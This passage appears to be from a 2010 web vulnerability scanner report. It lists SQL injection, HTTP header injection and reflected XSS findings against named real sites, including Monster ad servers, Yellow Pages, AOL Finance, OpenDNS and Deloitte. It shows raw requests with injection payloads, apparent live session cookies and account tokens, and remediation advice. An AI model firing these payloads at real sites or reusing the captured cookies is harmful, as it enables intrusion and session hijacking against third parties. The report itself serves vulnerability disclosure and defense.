GET /event.ng/Type''=click&FlightID=374308&AdID=456354&TargetID=73789&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=33349,38779,39959,39962,42970,49715,53574,54687,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,73789,106821&Values=77,85,94,211,412,1053,1435,6027,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.goodlifefitness.monstermediaworks.ca/ HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://www.goodlifefitness.monstermediaworks.ca/ Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=391895&AdID=478286&TargetID=100459&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49427,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,100459,106821&Values=77,85,94,211,412,668,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32196,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.west49.monstermediaworks.ca/index.html HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:32:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=391895&AdID=478286&TargetID=100459&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49427,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,100459,106821&Values=77,85,94,211,412,668,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32196,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.west49.monstermediaworks.ca/index.html HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:32:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://www.west49.monstermediaworks.ca/index.html Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=391909&AdID=478329&TargetID=129657&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49536,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,129657,115556&Values=77,85,94,211,412,1053,1435,4719,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/jobsearch.monster.ca/search.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:26:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=391909&AdID=478329&TargetID=129657&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=3029,33349,38779,39959,39962,42970,49536,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,129657,115556&Values=77,85,94,211,412,1053,1435,4719,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/jobsearch.monster.ca/search.aspx HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:26:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://jobsearch.monster.ca/search.aspx Content-type: text/html Content-length: 0
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=393979&AdID=480660&TargetID=93538&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=18061,33349,38779,39959,39962,42970,49533,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,93538,106821&Values=77,85,94,211,412,1004,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.scotiabank.com/cda/content/0,1608,CID13424_LIDen,00.html HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 1
HTTP/1.1 500 Server Error Connection: close Date: Fri, 26 Nov 2010 19:26:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
Unable to process Ad request
Request 2
GET /event.ng/Type''=click&FlightID=393979&AdID=480660&TargetID=93538&ASeg=&AMod=&AOpt=0&ASeg=&AMod=&Segments=18061,33349,38779,39959,39962,42970,49533,49715,53574,55561,55882,61588,62430,62432,66646,67259,67765,67994,68022,68315,68924,69493,69624,70081,70242,70645,70972,71653,71889,72934,72992,73383,73389,73459,73504,73533,73657,73920,73932,74099,74158,74179,74543,74597,74874,74876,74934,74964,75003,75635,75855,76068,76101,76700,76701,76702,76866,77024,77155,77274,77275,77276,77277,77278&Targets=50330,93538,106821&Values=77,85,94,211,412,1004,1053,1435,18179,29394,29450,29515,29539,29572,29671,29788,29989,30219,30256,30301,30655,32224,33248,41343,42640,46083,53886&RawValues=&Redirect=http:/www.scotiabank.com/cda/content/0,1608,CID13424_LIDen,00.html HTTP/1.1 Host: ads.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NGUserID=a057e0c-3300-1290799468-3; WT_FPC=id=10.5.199.242-3289047328.30115232:lv=1289923936491:ss=1289923936491; v1st=697AB465A6B74D2F;
Response 2
HTTP/1.1 302 Found Connection: close Date: Fri, 26 Nov 2010 19:26:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-control: no-cache Pragma: max-age=0 Location: http://www.scotiabank.com/cda/content/0,1608,CID13424_LIDen,00.html Content-type: text/html Content-length: 0
2. HTTP header injectionpreviousnext There are 2 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://affiliates.yellowpages.ca/clicklog.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://affiliates.yellowpages.ca
Path:
/clicklog.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 32ab0%0d%0abbc1ec17ef9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /clicklog.do?32ab0%0d%0abbc1ec17ef9=1 HTTP/1.1 Host: affiliates.yellowpages.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A578A9D0914694D50184F33656E49039;
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 26 Nov 2010 19:25:58 GMT Server: Apache Location: http://www.yellowpages.ca/search/?32ab0 bbc1ec17ef9=1 Content-Language: en Content-Length: 0 Connection: close Content-Type: text/html;charset=UTF-8
The value of REST URL parameter 4 is copied into the Location response header. The payload b6cfb%0d%0a556a658f8ad was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /quotes/monster-worldwide-inc/mww/b6cfb%0d%0a556a658f8ad HTTP/1.1 Host: finance.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guide.opendns.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe3c"><script>alert(1)</script>4aa95d6be0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bbe3c\"><script>alert(1)</script>4aa95d6be0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=www%2Ecemanitoba%2Ecom&servfail&bbe3c"><script>alert(1)</script>4aa95d6be0b=1 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|U0QMKvOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7Y07781s|8s7Y07781s|8s7Y07781s|8|8s7Y07781s|8s7Y07781s
3.2. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guide.opendns.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835bf"><script>alert(1)</script>934ea414490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 835bf\"><script>alert(1)</script>934ea414490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=www%2Ecemanitoba%2Ecom&servfail&835bf"><script>alert(1)</script>934ea414490=1 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|U0QMKvOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7Y07781s|8s7Y07781s|8s7Y07781s|8|8s7Y07781s|8s7Y07781s
The value of the servfail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6a01"><script>alert(1)</script>4921e725b90 was submitted in the servfail parameter. This input was echoed as d6a01\"><script>alert(1)</script>4921e725b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=www%2Ecemanitoba%2Ecom&servfaild6a01"><script>alert(1)</script>4921e725b90 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|U0QMKvOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7Y07781s|8s7Y07781s|8s7Y07781s|8|8s7Y07781s|8s7Y07781s
The value of the servfail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1027b"><script>alert(1)</script>127dc6449b8 was submitted in the servfail parameter. This input was echoed as 1027b\"><script>alert(1)</script>127dc6449b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?url=www%2Ecemanitoba%2Ecom&servfail1027b"><script>alert(1)</script>127dc6449b8 HTTP/1.1 Host: guide.opendns.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmx=207386316.00012306182230551517:3:1; __utmxx=207386316.00012306182230551517:1774337:2592000; __utmz=207386316.1290264528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207386316.633541220.1290264528.1290264528.1290264528.1; OPENDNS_ACCOUNT=05ac4ddebab905eed8c88999fa18bb80; OUN=m7PsKwIJcKYMvq1Mcmca8ErKsy7gUMliFZtnhIcTeYEfDFi%2FLKrtpFf%2FnhOY7xPYbwM7oqMT0lRSv6jNwyns7IGjxJG4T5kWvFRZCZS51akAp0EDEXguqEV%2Fa%2BhBQG7c5OQqfjcWJJBMU71JluOvBvv3gVCVfwdG; t=0-1298937600; LPUID=46e52ed1-9c3b-c374-31b5-d84715b8ceb4; __qca=P0-2135470522-1290702286339; fpc10002134856462=bmVcHWxK|U0QMKvOKaa|fses10002134856462=|U0QMKvOKaa|bmVcHWxK|fvis10002134856462=ZT1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkYlM0YmZj1odHRwJTNBJTJGJTJGZ3VpZGUub3BlbmRucy5jb20lMkZtYWluJTNGdXJsJTNEd2F0ZXJsb29ra2lvc2suY29tJmI9T3BlbkROUw==|8s7Y07781s|8s7Y07781s|8s7Y07781s|8|8s7Y07781s|8s7Y07781s
3.5. http://jobs.deloitte.com/ca/greater-vancouver/management-consulting-jobs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jobs.deloitte.com
Path:
/ca/greater-vancouver/management-consulting-jobs
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d577'-alert(1)-'b94ddde0973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ca/greater-vancouver/management-consulting-jobs?6d577'-alert(1)-'b94ddde0973=1 HTTP/1.1 Host: jobs.deloitte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 26 Nov 2010 19:39:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: apstr=; expires=Sat, 26-Nov-2011 19:39:02 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 30404
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head id="He ...[SNIP]...
3.6. http://js.worthathousandwords.com/IA.jsh [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://js.worthathousandwords.com
Path:
/IA.jsh
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71225'%3balert(1)//d6624635fd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71225';alert(1)//d6624635fd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /IA.jsh?71225'%3balert(1)//d6624635fd2=1 HTTP/1.1 Host: js.worthathousandwords.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: private, max-age=7200 Date: Fri, 26 Nov 2010 19:36:12 GMT Content-Length: 266 Connection: close
var callID = 'http://js.worthathousandwords.com/IA.jsh?71225';alert(1)//d6624635fd2=1'; document.write('<div style="font-size:28px;" ><b>PLEASE REMOVE THIS IMAGE CALL </b>'); document.write(callID) ...[SNIP]...
3.7. http://monsterca.careerperfect.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://monsterca.careerperfect.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c2f"><script>alert(1)</script>495af72082d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?80c2f"><script>alert(1)</script>495af72082d=1 HTTP/1.1 Host: monsterca.careerperfect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aea9c'%3b57e13698d9b was submitted in the REST URL parameter 5. This input was echoed as aea9c';57e13698d9b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cgi-bin/WebObjects/ShopToIt.woa/wa/productSearchaea9c'%3b57e13698d9b HTTP/1.1 Host: shop.listingsca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6abb3'%3b94cfe8ba3bc was submitted in the REST URL parameter 4. This input was echoed as 6abb3';94cfe8ba3bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
